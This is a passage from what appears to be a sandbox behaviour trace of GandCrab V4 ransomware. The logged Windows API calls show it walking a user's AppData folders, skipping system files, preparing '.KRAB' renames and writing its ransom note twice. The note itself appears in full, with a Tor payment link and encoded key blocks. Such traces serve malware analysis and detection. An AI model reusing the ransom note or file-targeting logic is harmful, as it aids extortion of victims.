(lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.740] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.740] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.740] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0060.740] FindClose (in: hFindFile=0xfbd1e0 | out: hFindFile=0xfbd1e0) returned 1 [0060.740] CloseHandle (hObject=0x440) returned 1 [0060.741] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.741] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.741] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.741] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a08d2ca4dee3d.lock" [0060.741] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.741] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 87 [0060.741] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a08d2ca4dee3d.lock") returned 82 [0060.741] lstrlenW (lpString=".lock") returned 5 [0060.741] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.742] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.742] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.742] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.742] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.742] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.742] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.742] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\KRAB-DECRYPT.txt" [0060.742] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.743] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\KRAB-DECRYPT.txt.KRAB") returned 80 [0060.743] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\KRAB-DECRYPT.txt") returned 75 [0060.743] lstrlenW (lpString=".txt") returned 4 [0060.743] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.743] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.743] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.743] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\KRAB-DECRYPT.txt") returned 75 [0060.743] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\KRAB-DECRYPT.txt") returned 75 [0060.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.743] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.744] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.744] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.744] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.744] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.744] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.744] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.744] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.744] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0060.744] FindClose (in: hFindFile=0xfbd8e0 | out: hFindFile=0xfbd8e0) returned 1 [0060.744] CloseHandle (hObject=0x3ac) returned 1 [0060.744] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0060.745] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0060.745] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0060.745] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Network" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network" [0060.745] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\" [0060.745] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.745] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.745] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.745] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.745] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.745] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.745] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.746] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\\\KRAB-DECRYPT.txt") returned 73 [0060.746] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0060.747] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.747] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.748] CloseHandle (hObject=0x3ac) returned 1 [0060.748] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.748] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.748] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x3b2)) [0060.748] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.749] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.749] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.749] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a08d2ca4dee3d.lock") returned 79 [0060.749] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0060.750] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.750] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.750] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\") returned 56 [0060.750] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*" [0060.750] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd420 [0060.750] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.750] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.750] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.751] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.751] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.751] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0060.751] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0060.751] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="Connections" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0060.751] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0060.751] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.751] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.751] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.751] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.751] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.751] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.752] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.754] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\KRAB-DECRYPT.txt") returned 85 [0060.754] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0060.759] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.759] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.761] CloseHandle (hObject=0x440) returned 1 [0060.762] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.763] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.765] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x7, wMilliseconds=0x3c1)) [0060.765] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.765] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.765] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", 